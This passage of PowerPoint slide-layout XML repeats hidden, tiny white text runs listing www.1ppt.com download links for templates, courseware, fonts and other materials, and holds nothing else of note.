              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout161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61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61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61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6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62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62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62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62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62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62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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout162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62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62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62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6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63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63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63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63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63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63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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout163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63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63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63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6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64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64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64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64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64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64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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
